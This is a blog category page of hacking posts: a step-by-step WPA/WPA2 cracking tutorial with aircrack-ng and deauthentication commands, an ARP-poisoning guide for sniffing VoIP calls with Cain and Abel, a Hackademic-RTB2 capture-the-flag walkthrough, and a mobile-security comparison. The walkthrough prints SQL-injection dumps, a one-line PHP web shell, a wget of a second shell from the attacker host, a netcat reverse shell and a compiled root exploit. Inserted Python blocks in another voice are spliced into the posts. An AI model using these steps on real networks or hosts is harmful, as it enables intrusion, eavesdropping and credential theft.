266 posts in the 'Hacking' category

  1. 2015.02.01 WIFI KALI LINUX HACKING by CEOinIRVINE
  2. 2015.01.13 VoIP Cain and Abel by CEOinIRVINE
  3. 2015.01.12 How To Hack Test Your WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng by CEOinIRVINE
  4. 2015.01.08 Wireless Hacking by CEOinIRVINE
  5. 2014.08.19 Hackademic-RTB2 by CEOinIRVINE
  6. 2014.08.09 Mobile security: iOS vs. Android vs. BlackBerry vs. Windows Phone by CEOinIRVINE
  7. 2014.08.06 Web Application Security by CEOinIRVINE
  8. 2014.06.12 Top 10 Most Searched Metasploit Exploit and Auxiliary Modules by CEOinIRVINE
  9. 2014.04.19 Must-Have Tools: Software mobile by CEOinIRVINE
  10. 2014.02.26 Background Monitoring on Non-Jailbroken iOS 7 Devices — and a Mitigation by CEOinIRVINE

WIFI KALI LINUX HACKING

Hacking 2015. 2. 1. 04:45

How To Hack Test Your WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng

Kali Linux can be used for many things, but it is probably best known for its ability to penetration test, or “hack,” WPA and WPA2 networks. There are hundreds of Windows applications that claim they can hack WPA; don’t get them! They’re just scams, used by professional hackers to lure newbie or wannabe hackers into getting hacked themselves. There is only one way that hackers get into your network, and that is with a Linux-based OS, a wireless card capable of monitor mode, and aircrack-ng or similar. Also note that, even with these tools, Wi-Fi cracking is not for beginners. Playing with it requires basic knowledge of how WPA authentication works and moderate familiarity with Kali Linux and its tools, so any hacker who gains access to your network is probably no beginner!

These are things that you’ll need:

If you have these then roll up your sleeves and let’s see how secure your network is!

Important notice: Hacking into anyone’s Wi-Fi without permission is considered an illegal act or crime in most countries. We are performing this tutorial for the sake of penetration testing, hacking to become more secure, and are using our own test network and router.

By reading and/or using the information below, you are agreeing to our Disclaimer, which can be found here: http://lewiscomputerhowto.blogspot.com/disclaimor.html


Step One:

Start Kali Linux and login, preferably as root.

Step 1

Step Two: 

Plug in your injection-capable wireless adapter (unless your computer’s built-in card already supports it). If you’re using Kali in VMware, you might have to connect the card via the icon in the device menu.

Step Three:

Disconnect from all wireless networks, open a Terminal, and type airmon-ng

Step 3

This will list all of the wireless cards that support monitor (not injection) mode. If no cards are listed, try disconnecting and reconnecting the card and check that it supports monitor mode. You can check by typing ifconfig in another terminal: if the card is listed in ifconfig but doesn’t show up in airmon-ng, then the card doesn’t support it.
You can see here that my card supports monitor mode and that it’s listed as wlan0.

Step Four:

Type airmon-ng start followed by the interface name of your wireless card. Mine is wlan0, so my command would be: airmon-ng start wlan0

Step 4

The “(monitor mode enabled)” message means that the card has successfully been put into monitor mode. Note the name of the new monitor interface; mine is mon0.

Step Five:

Type airodump-ng followed by the name of the new monitor interface, which is probably mon0.

Step 5

Step Six:

Airodump will now list all of the wireless networks in your area, and lots of useful information about them. Locate your network or the network that you have permission to penetration test. Once you’ve spotted your network on the ever-populating list, hit Ctrl + C on your keyboard to stop the process. Note the channel of your target network.

step 6

Step Seven:

Copy the BSSID of the target network
Step 7
Now type this command: 
airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
Replace [channel] with the channel of your target network, paste the network BSSID where [bssid] is, and replace [monitor interface] with the name of your monitor-enabled interface (mon0).

A complete command should look like this: 
airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0


Now press enter.

Step Eight:

Airodump will now monitor only the target network, allowing us to capture more specific information about it. What we’re really doing now is waiting for a device to connect or reconnect to the network, which makes the router send out the four-way handshake that we need to capture in order to crack the password.
Also, four files should show up on your Desktop; this is where the handshake will be saved when captured, so don’t delete them!

But we’re not really going to wait for a device to connect, no, that’s not what impatient hackers do. We’re actually going to use another cool-tool that belongs to the aircrack suite called aireplay-ng, to speed up the process. Instead of waiting for a device to connect, hackers use this tool to force a device to reconnect by sending deauthentication (deauth) packets to the device, making it think that it has to reconnect with the router.

Of course, in order for this tool to work, there has to be someone else connected to the network first, so watch airodump-ng and wait for a client to show up. It might take a long time, or it might only take a second before the first one shows. If none show up after a lengthy wait, then the network might be empty right now, or you’re too far away from the network.

You can see in this picture, that a client has appeared on our network, allowing us to start the next step.

Step 8

Step Nine:

Leave airodump-ng running and open a second terminal. In this terminal, type this command:
aireplay-ng -0 2 -a [router bssid] -c [client bssid] mon0
The -0 is a shortcut for the deauth attack mode, and the 2 is the number of deauth packets to send.
-a indicates the access point (router) BSSID; replace [router bssid] with the BSSID of the target network, which in my case is 00:14:BF:E0:E8:D5.
-c indicates the client’s address (its MAC), noted in the previous picture; replace [client bssid] with the address of the connected client, listed under “STATION.”
And of course, mon0 is merely the monitor interface; change it if yours is different.

My complete command looks like this: 
aireplay-ng -0 2 -a 00:14:BF:E0:E8:D5 -c 4C:EB:42:59:DE:31 mon0

Step 9

Step Ten:

Upon hitting Enter, you’ll see aireplay-ng send the packets, and within moments, you should see this message appear on the airodump-ng screen!

step 10

This means that the handshake has been captured, and the password is in the hacker’s hands in some form or another. You can close the aireplay-ng terminal and hit Ctrl + C in the airodump-ng terminal to stop monitoring the network, but don’t close it yet, in case you need some of the information later.

Step 11:

This concludes the external part of this tutorial. From now on, the process is entirely between your computer and those four files on your Desktop; actually, only the .cap one is important. Open a new Terminal and type in this command:
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

-a is the attack mode aircrack-ng will use to crack the handshake; 2 = WPA method.
-b stands for BSSID; replace [router bssid] with the BSSID of the target router. Mine is 00:14:BF:E0:E8:D5.
-w stands for wordlist; replace [path to wordlist] with the path to a wordlist that you have downloaded. I have a wordlist called “wpa.txt” in the root folder.
/root/Desktop/*.cap is the path to the .cap file containing the captured handshake; the * is a wildcard in Linux, and since I’m assuming that there are no other .cap files on your Desktop, this should work fine the way it is.

My complete command looks like this:
aircrack-ng -a2 -b 00:14:BF:E0:E8:D5 -w /root/wpa.txt /root/Desktop/*.cap

Now press Enter.

Step 12:

Aircrack-ng will now launch into the process of cracking the password. However, it will only crack it if the password happens to be in the wordlist that you’ve selected. Sometimes, it’s not. If this is the case, then you can congratulate the owner on being “Impenetrable,” of course, only after you’ve tried every wordlist that a hacker might use or make! 

Cracking the password might take a long time depending on the size of the wordlist. Mine went very quickly.

If the phrase is in the wordlist, then aircrack-ng will show it to you like this:


The passphrase to our test-network was “notsecure,” and you can see here that aircrack found it.

If you find the password without a decent struggle, then change your password, if it’s your network. If you’re penetration testing for someone, then tell them to change their password as soon as possible.
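As an added illustration (my code, not part of the tutorial): Step 12 only succeeds when the passphrase is in the wordlist because every guess has to be run through the WPA2-PSK key derivation, PBKDF2-HMAC-SHA1 salted with the SSID for 4096 rounds, before it can be checked against the handshake. The Python below derives that key, verifies it against the published 802.11i test vector, and estimates how long a wordlist of a given size takes at the rate this CPU manages; the SSID names and the guess strings are constructed.

```python
import hashlib
import time

# WPA/WPA2-PSK turns the passphrase into a 256-bit Pairwise Master Key with
# PBKDF2-HMAC-SHA1, salted with the SSID and run for 4096 iterations
# (IEEE 802.11i). aircrack-ng has to repeat this for every wordlist entry
# until a derived key verifies against the captured four-way handshake.
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the PMK for a passphrase on the given SSID."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("a WPA passphrase is 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1",
        passphrase.encode("ascii"),
        ssid.encode("utf-8"),
        PBKDF2_ITERATIONS,
        dklen=PMK_LEN,
    )


def measure_rate(ssid: str = "testnet", sample: int = 25) -> float:
    """Measure how many passphrase guesses per second this CPU can derive.

    Each guess costs a full PBKDF2 run. Dedicated cracking hardware is far
    faster, so treat the result as a lower bound on attacker capability.
    """
    start = time.perf_counter()
    for i in range(sample):
        wpa2_pmk(f"candidate{i:04d}", ssid)  # constructed throwaway guesses
    return sample / (time.perf_counter() - start)


def worst_case_seconds(wordlist_entries: int, guesses_per_second: float) -> float:
    """Time needed to exhaust a wordlist of the given size at the given rate."""
    if guesses_per_second <= 0:
        raise ValueError("rate must be positive")
    return wordlist_entries / guesses_per_second


if __name__ == "__main__":
    # Published 802.11i test vector: passphrase "password" on SSID "IEEE".
    print(wpa2_pmk("password", "IEEE").hex())
    # The same passphrase on a different SSID yields an unrelated PMK, which
    # is why precomputed tables only help against common SSID names.
    print(wpa2_pmk("password", "IEEE") != wpa2_pmk("password", "ieee"))
    rate = measure_rate()
    print(f"{rate:.0f} guesses/s on this CPU; a 10M-entry list takes at most "
          f"{worst_case_seconds(10_000_000, rate) / 3600:.1f} h")
```

A passphrase that is not in any wordlist forces the attacker into this per-guess cost for the whole keyspace, which is the only thing standing between a captured handshake and the key.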


Posted by CEOinIRVINE

VoIP Cain and Abel

Hacking 2015. 1. 13. 12:22

How To Sniff VOIP Session Using Cain







According to wikipedia:


Voice over Internet Protocol (Voice over IP, VoIP) is one of a family of internet technologies, communication protocols, and transmission technologies for delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet. Other terms frequently encountered and often used synonymously with VoIP are IP telephony, Internet telephony, voice over broadband (VoBB), broadband telephony, and broadband phone.

Cain is an excellent piece of software that can be used for sniffing VOIP. There are a couple of methods to sniff a VOIP session, but in this tutorial I will explain how you can use a man-in-the-middle attack with Cain and Abel to sniff a VOIP conversation.

Sniff VOIP Session With Cain

So here is how you can capture a VOIP session on your network:

Step 1 - First of all, download Cain and install it.

Step 2 - Once Cain is successfully installed, launch it, then start the sniffer by clicking on the small green button just below the File menu.

Step 3 - Next, click on the blue "+" at the top, choose "All hosts in my subnet" and click OK.



Step 4 - This will show you all the active hosts on your network.



Step 5 - Next, go to the ARP tab at the bottom and press the blue "+" sign, select the hosts on which you want to perform a man-in-the-middle attack and click OK.


Step 6 - Now click on the little yellow "Microtoxic" button at the top to launch the ARP poisoning attack, which is the technique behind this man-in-the-middle attack.



Step 7 - Next, click the VOIP tab at the bottom; if Cain has captured a VOIP session, you will see similar results.


I hope you have enjoyed reading the post; I will also write an article on protecting your VOIP sessions in the upcoming posts.



http://www.rafayhackingarticles.net/2011/04/how-to-sniff-voip-session-using-cain.html
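As an added, defender-side example that is not part of the original post: the ARP poisoning Cain performs in Step 6 leaves a trace on the wire, an IP whose announced MAC suddenly changes and one MAC answering for several IPs. The Python below runs both checks over a constructed set of ARP replies (all addresses are made up).

```python
from collections import namedtuple

# One ARP reply as seen on the wire: who answered for which IP, and when.
ArpReply = namedtuple("ArpReply", "ts sender_ip sender_mac")
MacChange = namedtuple("MacChange", "ts ip old_mac new_mac")

# Constructed sample. The gateway .1 and a phone .20 answer normally, then a
# third host (cc:...) starts answering for both of them, which is what the
# ARP poisoning step in the post produces, and finally the attack stops.
SAMPLE_REPLIES = [
    ArpReply(0.0, "192.168.1.1", "aa:bb:cc:00:00:01"),
    ArpReply(1.0, "192.168.1.20", "aa:bb:cc:00:00:20"),
    ArpReply(5.0, "192.168.1.1", "cc:cc:cc:cc:cc:cc"),
    ArpReply(5.2, "192.168.1.20", "cc:cc:cc:cc:cc:cc"),
    ArpReply(9.0, "192.168.1.1", "aa:bb:cc:00:00:01"),
]


def detect_arp_spoof(replies, trusted=None):
    """Walk ARP replies in order and report two poisoning signals.

    changes:  an IP whose announced MAC differs from what was seen (or
              trusted) before; during an active attack this flaps between
              the real owner and the attacker.
    multi_ip: one MAC that has answered for more than one IP, i.e. a host
              sitting between both victims. Routers and failover setups
              legitimately own several IPs, so MACs listed in `trusted`
              (an IP -> MAC map, e.g. the gateway) are excluded here.
    """
    table = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    trusted_macs = set(table.values())
    ips_by_mac = {}            # every IP each MAC has ever claimed
    changes = []
    for r in replies:
        mac = r.sender_mac.lower()
        prev = table.get(r.sender_ip)
        if prev is not None and prev != mac:
            changes.append(MacChange(r.ts, r.sender_ip, prev, mac))
        table[r.sender_ip] = mac
        ips_by_mac.setdefault(mac, set()).add(r.sender_ip)
    multi_ip = {m: ips for m, ips in ips_by_mac.items()
                if len(ips) > 1 and m not in trusted_macs}
    return {"changes": changes, "multi_ip": multi_ip}


if __name__ == "__main__":
    result = detect_arp_spoof(SAMPLE_REPLIES)
    for c in result["changes"]:
        print(f"t={c.ts}: {c.ip} moved from {c.old_mac} to {c.new_mac}")
    for mac, ips in result["multi_ip"].items():
        print(f"{mac} answered for {sorted(ips)}")
```

Static ARP entries for the gateway, or Dynamic ARP Inspection on managed switches, remove the condition this detector looks for in the first place.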

Posted by CEOinIRVINE

How To Hack Test Your WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng

Please use this information only in legal ways

Lewis Encarnacion

 


 


Posted by CEOinIRVINE

Wireless Hacking

Hacking 2015. 1. 8. 23:23

Posted by CEOinIRVINE

Hackademic-RTB2

Hacking 2014. 8. 19. 05:22

Hackademic-RTB2

Introduction

Description

Hackademic RTB2 is the second edition of Hackademic vulnerable Virtual Machine. The first challenge is described here.

Installation

Hackademic RTB2 can be downloaded from following places:

Check the md5sum: 4c35e875e0ae2f872af6751f259b82b7

Environment

  • Attacker: 192.168.1.43 (BackTrack 5 R2)
  • Victim: 192.168.1.9 (VMWare Fusion)

Should you need to discover the IP address of your target, use tools like fping, netdiscover or nmap.

Challenge

Assessment

Services/Versions

A first nmap scan shows a web server on port 80/tcp and a service on port 666/tcp that looks filtered:

root@bt:~# nmap -sS 192.168.1.9

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-04-08 07:57 EDT
Nmap scan report for 192.168.1.9
Host is up (0.00072s latency).
Not shown: 998 closed ports
PORT    STATE    SERVICE
80/tcp  open     http
666/tcp filtered doom
MAC Address: 00:0C:29:E5:3D:EC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds

A complete scan (against TCP and UDP) provides us with following results:

root@bt:/pentest/database/sqlmap# nmap -sS -sU -A 192.168.1.10

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-04-07 16:36 EDT
Nmap scan report for 192.168.1.10
Host is up (0.00036s latency).
Not shown: 1950 closed ports, 47 open|filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Hackademic.RTB2
666/tcp  open  http    Apache httpd 2.2.14 ((Ubuntu))
| http-robots.txt: 14 disallowed entries 
| /administrator/ /cache/ /components/ /images/ 
| /includes/ /installation/ /language/ /libraries/ /media/ 
|_/modules/ /plugins/ /templates/ /tmp/ /xmlrpc/
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Hackademic.RTB2
5353/udp open  mdns    DNS-based service discovery
| dns-service-discovery: 
|   9/tcp workstation
|_    Address=192.168.1.10 2a01:e35:8b15:3430:20c:29ff:fee5:3dec
MAC Address: 00:0C:29:E5:3D:EC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.17 - 2.6.36
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.36 ms 192.168.1.10

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1119.53 seconds

It shows that port 666/tcp is now open and hosting a web service; this makes us think of port knocking. There is also a DNS-based service on port 5353/udp.

Web service

Let's analyze what could be interesting on port 80/tcp. Point your browser to the root of the target:

Hackademic-RTB2-001.png

Using dirbuster also discloses the presence of a phpmyadmin interface:

Hackademic-RTB2-002.png

Find vulnerabilities in the first form

Let's try to find a vulnerability in the first authentication form. I have used W3AF as well as sqlmap but have found no SQL injection. Using fuzzing techniques with Burp Suite (Intruder module) against the password field leads to the discovery of an SQL injection:

Hackademic-RTB2-003.png

Notice that it's a real fuzzing exercise here (I must confess it's also a little bit by chance) to discover the injection: you will have to use the full list of SQL injection strings from Burp Suite as well as suffix them with a single quote. On the other hand, the authentication mechanism doesn't make use of a database at all. The PHP code will show that the following combination is hard coded:

  • login: admin
  • password: ' or 1=1 --'

Anyway, this combination leads to a new message as well as a long encoded string:

Hackademic-RTB2-004.png

Find the port-knocking combination

First decode the URL-based message. It looks like a hex-encoded string. Use online resources to decode it (e.g. http://home.paulschou.net/tools/xlate/):

Hackademic-RTB2-005.png

The hint "Knock knock knockin' on heaven's door" now confirms that this string will lead to the port knocking combination. Let's copy the binary message, paste it in the binary field and decode it:

Hackademic-RTB2-006.png

Open port 666/tcp

The combination is 1001:1101:1011:1001. Let's assume it is a sequence of TCP ports to knock on in order to open port 666/tcp on the target. We will use netcat to compose the sesame:

# for i in 1001 1101 1011 1001; do nc -z 192.168.1.9 $i; done

Let's check that it has opened the service by pointing to http://192.168.1.19:666. It works: we can see the welcome page of a Joomla 1.5 portal.
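The decoding chain from the two previous sections (URL-based message, hex, hint text plus a bit string, the 1001:1101:1011:1001 combination read as decimal port numbers) as an added Python example that is not part of the write-up. The real challenge string only appears in the screenshots, so the block builds a constructed sample with the same layout and decodes it back; the decoder only returns the port list and does no knocking.

```python
import re
from urllib.parse import unquote

# Hint the challenge places in front of the bit string (quoted in the write-up).
HINT = "Knock knock knockin' on heaven's door"


def hex_to_text(message: str) -> str:
    """Stage 1: the message is hex-encoded ASCII. Undo URL escapes and drop
    any separators (spaces, newlines) before decoding."""
    hexdigits = re.sub(r"[^0-9a-fA-F]", "", unquote(message))
    if len(hexdigits) % 2:
        raise ValueError("odd number of hex digits; message is truncated")
    return bytes.fromhex(hexdigits).decode("ascii", errors="replace")


def bits_to_text(text: str) -> str:
    """Stage 2: collect the space-separated 8-bit groups and map each to a
    character. Lookarounds make sure only exact 8-bit groups are taken."""
    groups = re.findall(r"(?<![01])[01]{8}(?![01])", text)
    return "".join(chr(int(g, 2)) for g in groups)


def knock_sequence(message: str) -> list[int]:
    """Full chain: hex -> hint + bits -> '1001:1101:1011:1001' -> TCP ports.
    As in the write-up, each group is used as a decimal port number."""
    decoded = hex_to_text(message)
    if HINT not in decoded:
        raise ValueError("hint not found; this is not the knock message")
    combo = bits_to_text(decoded)
    ports = [int(p) for p in combo.split(":")]
    for p in ports:
        if not 1 <= p <= 65535:
            raise ValueError(f"{p} is not a valid TCP port")
    return ports


def build_sample(ports: list[int]) -> str:
    """Constructed stand-in for the challenge string: same layout, same
    encoding, so the decoder can be exercised offline."""
    combo = ":".join(str(p) for p in ports)
    bits = " ".join(format(ord(c), "08b") for c in combo)
    return (HINT + "\n" + bits).encode("ascii").hex()


SAMPLE_HEX = build_sample([1001, 1101, 1011, 1001])

if __name__ == "__main__":
    print(hex_to_text(SAMPLE_HEX))
    print(knock_sequence(SAMPLE_HEX))
```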

Find a vulnerability in the second application

Now, time to find a vulnerability in the second application, the Joomla portal. Let's try to find a SQL injection. Sqlmap leads to the disclosure of the MySQL users:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.1.9:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" -D mysql -T user -C User,Password --dump
+-------------------------------------------+------------------+
| Password                                  | User             |
+-------------------------------------------+------------------+
| *5D3C124406BF85494067182754131FF4DAB9C6C7 | root             |
| *F36E6519B0B1D62AA2D5346EFAD66D1CAF248996 | debian-sys-maint |
| *5D3C124406BF85494067182754131FF4DAB9C6C7 | phpmyadmin       |
+-------------------------------------------+------------------+

However, these hashes are not known from previous cracks and, though John the Ripper could help, cracking them could take hours or days.

Let's try to dump the users from the Joomla database:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.1.9:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" \
   -D joomla -T jos_users -C name,password,username,usertype --dump
+----------------+-------------------------------------------------------------------+---------------+-----------------------+
| name           | password                                                          | username      | usertype              |
+----------------+-------------------------------------------------------------------+---------------+-----------------------+
| Administrator  | 08f43b7f40fb0d56f6a8fb0271ec4710:n9RMVci9nqTUog3GjVTNP7IuOrPayqAl | Administrator | Super%20Administrator |
| John%20Smith   | 992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF | JSmith        | Registered            |
| Billy%20Tallor | abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy | BTallor       | Registered            |
+----------------+-------------------------------------------------------------------+---------------+-----------------------+

But once again, trying to reverse the hashes is not straightforward. However, sqlmap offers the ability to read files. Let's try to read the configuration file:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.1.9:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" \
   --file-read="/var/www/configuration.php"
/var/www/configuration.php file saved to:    
'/pentest/database/sqlmap/output/192.168.1.9/files/_var_www_configuration.php'

Let's see what's inside:

root@bt:/pentest/database/sqlmap# egrep -i "user|password" output/192.168.1.9/files/_var_www_configuration.php 
var $user = 'root';
var $password = 'yUtJklM97W';
var $ftp_user = ;
var $offset_user = '0';
var $smtpuser = ;

Set up a backdoor

Now that we have the password for root, let's connect to the phpmyadmin interface. Go to http://192.168.1.9/phpmyadmin and use the above credentials.

Open a SQL window and create a rudimentary shell that we will use to download a more sophisticated one:

select "<?php system($_GET[\"cmd\"]); ?>" into outfile "/var/www/shell.php"

Let's test it:

Hackademic-RTB2-007.png

Now, let's download a more sophisticated PHP shell. Download it on your Backtrack machine, uncompress it in your /var/www/ directory and start your web server (/etc/init.d/apache2 start).

From your browser, use following commands:

http://192.168.1.9:666/shell.php?cmd=wget%20http://192.168.1.43/phpshell.txt

The above command will download the PHP shell. Now let's modify the extension to php:

http://192.168.1.9:666/shell.php?cmd=mv%20/var/www/phpshell.txt%20/var/www/phpshell.php

You should now be able to access your PHP shell:

Hackademic-RTB2-008.png

Reverse shell

To use the reverse shell, open a socket on your Backtrack with netcat:

nc -lvvp 5555

And from the "Back Connect" feature (top menu of the PHP shell interface), configure it as follows:

Hackademic-RTB2-009.png

From your Backtrack terminal, you now have a complete shell to the machine, with limited privileges:

root@bt:~# nc -lvvp 5555
listening on [any] 5555 ...
192.168.1.9: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.1.43] from (UNKNOWN) [192.168.1.9] 48972
expr: syntax error
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cd /root
cd: 3: can't cd to /root
uname -a
Linux HackademicRTB2 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux

Privilege escalation

After some research on http://www.exploit-db.com, you will find an exploit that works (http://www.exploit-db.com/download/14814).

From your reverse shell, download it, compile it and execute it:

wget http://www.exploit-db.com/download/14814 -O 14814.c
gcc 14814.c -o 14814
chmod +x 14814
./14814
id
uid=0(root) gid=0(root)

Decrypt the key

The Key.txt in /root contains base64-encoded data. Let's decode it and see what it is:

base64 -d Key.txt > output
file output
output: PNG image, 756 x 344, 8-bit/color RGB, non-interlaced

It's a PNG image. Let's copy it in /var/www:

mv output /var/www/

Here it is:

Hackademic-009.png


Posted by CEOinIRVINE

Mobile security: iOS vs. Android vs. BlackBerry vs. Windows Phone

The BYOD phenomenon is old news, with support from most companies. For IT organizations, that means ensuring proper security and management over the mobile devices employees are likely to use. In the last year, Apple's iPhone and iPad have become the new corporate standards due to high user satisfaction and superior security capabilities. iOS 7 pushes Apple's management and security into new areas, including application management and licensing.

But Samsung has been aggressively promoting its SAFE (Samsung Approved for Enterprise) extensions to Android and its add-on Knox management APIs to bolster its reach into businesses wary of Google’s historic lack of concern for security and the rampant malware on Android devices. SAFE targets the first concern. BlackBerry, once the IT darling due to its hundreds of security capabilities, is also trying to gain corporate respect with BlackBerry 10, which supports basic Exchange ActiveSync (EAS) policies out of the box (a first for BlackBerry), as well as a rich set of security features in its retooled BES 10 management server.

Then there’s Windows Phone 8, the third version of Microsoft’s attempt to deliver a popular smartphone OS. It’s historically given little heed to security concerns, but Version 8 endeavors to satisfy basic business security concerns. And the forthcoming Windows Phone 8.1 increases its capabilities even further.

Mobile security falls into two fundamental forms: Microsoft’s EAS policies and native APIs.

Exchange ActiveSync policy support compared
Microsoft Exchange, Microsoft System Center 2012, Google Docs for Business, and various third-party management tools support EAS policies out of the box. According to mobile analyst Chris Hazelton at the 451 Group, the core EAS policies cover most businesses' needs. But as Table 1 below shows, the various mobile OSes support different EAS policies; EAS support in and of itself doesn't tell you what security level you get.

Apple’s iOS 4.2 was the first major modern mobile OS to support EAS policies, and it helped catapult the iPhone to enterprise dominance. Since then, Google has increased Android’s EAS coverage in each version, with Android 4 supporting more EAS policies than previous versions. Samsung, the leading Android maker, has added policy support as well as APIs to Android 4 to many of its devices. (I detail which EAS policies each version of Android and Windows Phone support in the article “How Windows Phone 8 security compares to iOS and Android.”)

When you compare Windows Phone 8's EAS policy support to that of Windows Phone 7.5, there's not much difference. "Microsoft has not really added much on the management end," notes J.P. Halebeed, global director of R&D at mobile device management (MDM) vendor AirWatch. A critical addition is support for encryption on the device (it's on by default for internal storage, but not for SD cards) and the related support for EAS's encryption policies. The lack of support for encryption had been one of the biggest barriers to Windows Phone's business acceptance. Microsoft also supports the new information rights management (IRM) EAS policy, which lets companies enable rights management for data on devices; Microsoft of course has a corresponding IRM server product. But Windows Phone 8.1 does make some real leaps forward, as the tables in this article show.

Finally, BlackBerry added EAS support to the new BlackBerry 10 OS; previous versions could be secured only through the BlackBerry Enterprise Server (BES).

Table 1: EAS policy support compared

(“MDM” means a separate mobile device management server is required)

Policy | Apple iOS 6, 7 | Google Android 4 | Samsung Android 4 + SAFE | BlackBerry 10 | Microsoft Windows Phone 8
Allow device encryption | Yes | Yes | Yes | Yes | Yes
Require device encryption | Yes | No | MDM | Yes | Yes
Encrypt storage card | NA | Yes | Yes | No | Yes
Minimum password length | Yes | Yes | Yes | Yes | Yes
Minimum number of complex characters (password) | Yes | Yes | Yes | Yes | Yes
Password history | Yes | Yes | Yes | Yes | Yes
Device wipe threshold | Yes | Yes | Yes | Yes | Yes
Disable removable storage | MDM | No | MDM | No** | No
Disable camera | Yes | Yes | Yes | No** | No
Disable SMS text messaging | No | No | No | No | No
Disable Wi-Fi | MDM | No | MDM | No | No**
Disable Bluetooth | MDM | No | MDM | No** | No
Disable IrDA | NA | No | No | No | No
Require manual sync while roaming | Yes | Yes | Yes | No** | No
Allow Internet sharing from device | MDM | No | MDM | No** | MDM
Allow desktop sharing from device | MDM | No | MDM | No | No
Disable email attachment access | Yes | Yes | Yes | No | Yes
Disable POP3/IMAP4 email | MDM | No | No | Yes | No
Allow consumer email | No | No | No | No | No
Allow browser | Yes | MDM | MDM | No | MDM
Configure message formats (HTML or plain text) | No | No | No | No | No
Include past email items (days) | Yes | No | No | Yes | Yes
Email body truncation size (KB) | No | No | No | No | No**
HTML email body truncation size (KB) | No | No | No | No | No**
Include past calendar items (days) | No | No | No | Yes | No
Require signed S/MIME messages | No | No | No | No | No**
Require encrypted S/MIME messages | No | No | No | No | No**
Require signed S/MIME algorithm | No | No | No | No | No**
Require encrypted S/MIME algorithm | No | No | No | No | No**
Allow S/MIME encrypted algorithm negotiation | No | No | No | No | No**
Allow S/MIME soft certs | No | No | No | No | No**

Native security and management API capabilities compared
The other form of mobile security comes from the APIs in each mobile OS. These APIs vary widely across the OSes, and each requires a management tool. Many MDM tools support multiple mobile OSes, providing a single console for IT admins. Some also offer client apps that add capabilities not found in the native APIs, though this typically forces users to opt for proprietary email and other apps for business purposes. Table 2 below shows some of the more commonly requested management features typically implemented through APIs.

Apple, for example, has several dozen such APIs that use remotely installed configuration profiles not only to configure various iOS settings (such as preconfiguring VPN or allowed access points) but also to manage app behavior (such as disallowing the forwarding of corporate messages via personal accounts in Mail). iOS 6 added several new policies, including the ability to prevent app removal, lock a user to a specific app (such as for kiosk or retail usage), and prevent paid apps from being purchased. All are part of what iOS calls a supervised environment, in which the iPhone or iPad is treated as an appliance. iOS 7 adds a set of APIs for application management, including managed Open In, per-app VPNs, managed copy and paste across apps, and single sign-on, as well as true license management and profile-based app installation.

Along the same lines, in Windows Phone 8, Microsoft supports the ability to revoke applications, restrict email forwarding, remotely enroll or unenroll devices, and remotely update business-provisioned apps. One capability in Windows Phone 8 not available to other mobile OSes is its integration with Active Directory, notes Ahmed Datoo, vice president of marketing at MDM vendor Zenprise. This means that MDM tools such as Zenprise’s can access the Active Directory groups, then assign policies to those groups rather than maintain a separate set of groups in the MDM tool from the set in Active Directory. That’s a time-saver for IT, he notes; it reduces the risk of employees not being in the correct groups for the policies that should apply or falling through the cracks when terminated in, say, Active Directory but not in the MDM tool’s user database.

Microsoft and Google provide far fewer such capabilities in their APIs, though Samsung and Google’s Motorola Mobility unit have added their own security APIs to their Android 4 devices. For example, Samsung’s SAFE APIs allow IT admins to disable cameras, Bluetooth, tethering, voice recording, SD cards, and Wi-Fi.

Microsoft uses a central manager in Windows Phone 8 called DM Client that contains all the relevant user and corporate profiles (like the Windows Registry, in effect), rather than rely on a set of separate installed configuration profiles (like the OS X System Folder, in effect). And on September 17, Microsoft finally attained FIPS 140-2 certification, joining BlackBerry 10, iOS 6 and 7, and Samsung SAFE Android devices for this key federal security standard. 

Then there’s BlackBerry, the godfather of mobile security and management. Its BES offers hundreds of controls, and its Balance technology lets IT create a partition on a BlackBerry 10 device to keep personal and work apps and data separate. BlackBerry has a fairly confusing set of MDM products as it transitions from its old BlackBerry platform to the new one; I detail its various MDM products and how they relate in the article “BlackBerry’s road map to unified mobile management.”

Table 2: Other native management capabilities compared

(Typically requires a mobile device management server to use)

Capability | Apple iOS 6, 7 | Google Android 4 | Samsung Android 4 + SAFE | BlackBerry 10 + BES 10 | Microsoft Windows Phone 8
